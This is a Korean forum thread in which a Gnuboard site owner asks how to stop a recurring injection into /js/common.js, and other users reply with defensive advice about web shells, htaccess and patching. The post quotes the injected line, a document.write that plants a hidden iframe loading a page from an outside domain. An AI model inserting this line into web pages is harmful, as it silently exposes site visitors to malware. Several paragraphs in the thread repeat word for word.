몇달째 악성코드와 씨름중입니다. T.T 정보
몇달째 악성코드와 씨름중입니다. T.T본문
그누보드 /js/common.js 파일 맨 상단에 항상 아래의 코드가 주말마다 삽입됩니다.
document.write("<iframe width='116' height='1' src='http://moxsl.564vejoqd.com/mb.html'></iframe>");
위의형식으로 유알엘만 변경되어서 삽입되는데요.
이거 못들어오게 하려고, ftp 주소도 매번 변경하고, 하드포맷도 하고 했는데
도저히 해결을 못해서 이제는 포기하고 매번 사이트가 안될때마다 들어가서 지우곤 합니다.
몇달째 이러고 있다가 오늘(토)은 도저히 못 참겠어서 이렇게 질문글 올려봅니다.
어떤분께서는 보안패치를 하라고 하시는데, 게시판에 하도 손댄곳이 많아서
바로 게시판을 덮어씌우지도 못하고 있습니다....
특정부분에 손봐야할곳을 구체적으로 알 수 있다면 수정해보고싶은데.... T.T
도대체 어디를 고쳐야할까요... 저놈의 지긋지긋한 악성코드를 못들어오게 하려면.... T.T
저좀 도와주세요.... T.T
document.write("<iframe width='116' height='1' src='http://moxsl.564vejoqd.com/mb.html'></iframe>");
위의형식으로 유알엘만 변경되어서 삽입되는데요.
이거 못들어오게 하려고, ftp 주소도 매번 변경하고, 하드포맷도 하고 했는데
도저히 해결을 못해서 이제는 포기하고 매번 사이트가 안될때마다 들어가서 지우곤 합니다.
몇달째 이러고 있다가 오늘(토)은 도저히 못 참겠어서 이렇게 질문글 올려봅니다.
어떤분께서는 보안패치를 하라고 하시는데, 게시판에 하도 손댄곳이 많아서
바로 게시판을 덮어씌우지도 못하고 있습니다....
특정부분에 손봐야할곳을 구체적으로 알 수 있다면 수정해보고싶은데.... T.T
도대체 어디를 고쳐야할까요... 저놈의 지긋지긋한 악성코드를 못들어오게 하려면.... T.T
저좀 도와주세요.... T.T
댓글 전체
서버 해킹당한것이예요.
아파치 새롭게 설치하세요.
그래도 안되면 서버를 새롭게 설치하세요.
방법 없습니다. <-- 결론
아파치 새롭게 설치하세요.
그래도 안되면 서버를 새롭게 설치하세요.
방법 없습니다. <-- 결론
답변 감사합니다. 최대한 해보다가 안되면 그 방법이라도 알아봐야겠습니다. T.T
보통 웹에디터나 파일업로드할수 있는곳으로 해킹을 위한 웹쉘을 얹어서 프로그램을 수정하는게 보통입니다
이미지업로드 저장되는부분이나 템프디렉토리 위주로 웹셀있는지 기타 백도어 깔린게 있는지
점검바랍니당~
이미지업로드 저장되는부분이나 템프디렉토리 위주로 웹셀있는지 기타 백도어 깔린게 있는지
점검바랍니당~
답변해주셔서 감사드립니다. 제가 웹쉘같은걸 찾는 방법을 몰라서.....
여기저기 찾아서 좀 더 구체적인 방법 알아보도록 하겠습니다. T.T
여기저기 찾아서 좀 더 구체적인 방법 알아보도록 하겠습니다. T.T
일단 첨부파일 디렉토리에 php 실행 안되게 하시고(htaccess 이용한 방법 검색해보세요)
의심가는 php 파일 서버 콘솔에서 검색해 보세요. 다 삭제해 주세요.
그리고 그누보드의 보안 패치 부분은 아무리 힘들어도 모두 패치하세요.
파일 비교툴을 이용하면 어렵지 않습니다.
오류 대비해서 원본 백업해 두시고 작업학세요.
관련 자료 sir 에도 있습니다.
의심가는 php 파일 서버 콘솔에서 검색해 보세요. 다 삭제해 주세요.
그리고 그누보드의 보안 패치 부분은 아무리 힘들어도 모두 패치하세요.
파일 비교툴을 이용하면 어렵지 않습니다.
오류 대비해서 원본 백업해 두시고 작업학세요.
관련 자료 sir 에도 있습니다.
너무 감사드립니다. 일단 구체적인 방법을 잘 모르겠지만 최대한 노력해서 막아내보도록 하겠습니다. T.T
그런데 궁금한게.... 파일을 비교해서 보안패치된것만 업로드하거나 덮어씌우려면 어떻게 비교해야하나요? 일일히 보면서 비교는 어려울것같구.... 뭔가 방법이 있나요?